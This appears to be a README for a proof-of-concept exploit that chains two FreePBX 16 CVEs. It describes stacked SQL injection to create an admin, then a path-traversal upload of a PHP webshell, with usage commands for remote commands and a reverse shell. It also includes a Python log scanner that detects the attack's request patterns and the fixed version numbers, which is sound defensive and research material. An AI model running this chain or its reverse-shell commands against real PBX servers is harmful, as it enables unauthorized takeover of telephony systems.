## https://sploitus.com/exploit?id=C859A543-A5A3-5864-8659-9856045D369A
# FreePBX 16: Unauthenticated SQLi to RCE
Proof-of-concept exploit chaining two FreePBX vulnerabilities to go from **zero access** to
**remote code execution** on FreePBX 16.
| CVE | Component | Impact |
|-----|-----------|--------|
| **CVE-2025-57819** | Endpoint module loader (`brand` parameter) | Unauthenticated stacked SQL injection |
| **CVE-2025-61678** | Endpoint Manager firmware uploader (`fwbrand` parameter) | Authenticated arbitrary file upload (path traversal) |
## How it works
1. **Create an admin (CVE-2025-57819)**: a stacked SQL injection reachable without authentication
via the namespaced endpoint loader is used to `INSERT` a brand-new full-access administrator
directly into the `ampusers` table.
2. **Authenticate**: the PoC logs into the admin panel as the freshly created user.
3. **Drop a webshell (CVE-2025-61678)**: the Endpoint Manager firmware upload handler is abused
with a `../../../var/www/html/` traversal in `fwbrand` to write a PHP webshell into the
web root.
4. **Execute**: run a single command or receive an interactive reverse shell.
## Affected versions
FreePBX 16 (Endpoint module prior to `16.0.92`). Also patched in `17.0.6`.
Update to a fixed release.
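As an added defensive example (not part of this PoC or of FreePBX itself), the following Python scans Apache-style access logs for the two request indicators the chain above depends on, a `brand` value carrying a stacked SQL statement and an `fwbrand` value carrying `../` traversal, and checks an Endpoint module version against the fixed releases named above. The log lines and URL paths are constructed placeholders, since the page does not give the loader's path.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines; the /admin/ajax.php paths are placeholders,
# not the real FreePBX endpoint paths, which this page does not state.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /admin/config.php?display=extensions HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /admin/ajax.php?module=endpoint&brand=x%27%3B-- HTTP/1.1" 200 88
198.51.100.7 - - [01/Jan/2025:10:00:09 +0000] "POST /admin/ajax.php?module=endpointman&fwbrand=..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2F HTTP/1.1" 200 64
198.51.100.7 - - [01/Jan/2025:10:00:10 +0000] "GET /admin/ajax.php?module=endpoint&brand=yealink HTTP/1.1" 200 1024
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, bytes
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')
# A stacked query needs a statement separator; an INSERT or a reference to ampusers is the
# specific shape described in step 1 of the chain.
STACKED_SQL_RE = re.compile(r";|\binsert\b|\bampusers\b", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

def classify_request(target):
    """Return indicator labels for one request target (path + query), or [] if clean."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %XX once
    hits = []
    for value in query.get("brand", []):
        if STACKED_SQL_RE.search(unquote(value)):  # second unquote catches double encoding
            hits.append("CVE-2025-57819: stacked SQL in brand")
    for value in query.get("fwbrand", []):
        if TRAVERSAL_RE.search(unquote(value)):
            hits.append("CVE-2025-61678: path traversal in fwbrand")
    return hits

def scan_log(text):
    """Return (client_ip, timestamp, method, hits) for every suspicious request line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        hits = classify_request(m["target"])
        if hits:
            findings.append((m["ip"], m["ts"], m["method"], hits))
    return findings

def endpoint_module_fixed(version):
    """True if an Endpoint module version is at or past the fixed release (16.0.92 / 17.0.6);
    None for major versions the page says nothing about."""
    parts = tuple(int(p) for p in version.split("."))
    fixed = {16: (16, 0, 92), 17: (17, 0, 6)}
    return parts >= fixed[parts[0]] if parts[0] in fixed else None

if __name__ == "__main__":
    for ip, ts, method, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {method}: {', '.join(hits)}")
```

Run it against a real access log with `scan_log(open(path).read())`; a `brand` hit followed by an `fwbrand` hit from the same client is the full chain and warrants checking `ampusers` for unexpected administrators and the web root for newly written PHP files.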
## Usage
```bash
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
```
### Options
| Flag | Description |
|------|-------------|
| `--rhost` | Target host (required) |
| `--rport` | Target port (default `443`) |
| `--http` | Use HTTP instead of HTTPS |
| `--lhost` / `--lport` | Reverse-shell callback address |
| `--command` | Run a single command instead of a shell |
## Requirements
```bash
pip install requests pwntools
```
## Disclaimer
For authorized security testing and educational purposes only. Use it exclusively on systems you
own or have explicit written permission to test. The author assumes no liability for misuse.
---
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb